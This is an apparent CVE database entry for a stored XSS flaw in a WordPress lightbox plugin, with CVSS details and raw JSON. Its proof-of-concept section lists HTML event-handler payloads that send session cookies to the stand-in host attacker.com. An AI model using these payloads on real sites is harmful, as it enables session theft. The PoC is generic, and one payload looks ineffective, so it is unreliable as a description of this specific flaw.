Security Vulnerability Report
CVE-2025-9710 CVSS 6.3 MEDIUM

CVE-2025-9710

Published: 2025-10-06 06:15:37
Last Modified: 2026-04-15 00:35:42

Description

The Responsive Lightbox & Gallery WordPress plugin before 2.5.3 does not properly handle HTML tag attributes modifications, potentially allowing unauthenticated attackers to abuse the functionality to include event handlers and conduct Stored XSS attacks.

CVSS Details

CVSS Score: 6.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Responsive Lightbox & Gallery < 2.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2025-9710: Stored XSS via HTML attribute manipulation -->
<!-- The vulnerability exists in HTML tag attribute modification functionality -->

<!-- Example of malicious HTML attribute injection -->
<img src="valid-image.jpg" onerror="alert(document.cookie); fetch('https://attacker.com/steal?c='+document.cookie)">

<!-- Alternative payload using different event handlers -->
<div onmouseover="var i=new Image(); i.src='https://attacker.com/log?data='+document.cookie;">Hover me</div>

<!-- Payload targeting WordPress admin context -->
<a href="#" onclick="var x=new XMLHttpRequest(); x.open('POST','/wp-admin/admin-ajax.php',true); x.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); x.send('action=wp_ajax_nopriv&data='+document.cookie);">Click here</a>

<!--
Exploit flow:
1. Attacker submits content via the plugin's attribute modification feature
2. Malicious event handlers are stored in the database without sanitization
3. When victim views the page, the JavaScript executes in their browser context
4. Attacker captures sensitive data such as session cookies
-->

References

https://wpscan.com/vulnerability/a45c74b7-b174-479f-9681-464601b082df/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9710", "sourceIdentifier": "[email protected]", "published": "2025-10-06T06:15:37.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Responsive Lightbox & Gallery WordPress plugin before 2.5.3 does not properly handle HTML tag attributes modifications, potentially allowing unauthenticated attackers to abuse the functionality to include event handlers and conduct Stored XSS attacks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/a45c74b7-b174-479f-9681-464601b082df/", "source": "[email protected]"}]}}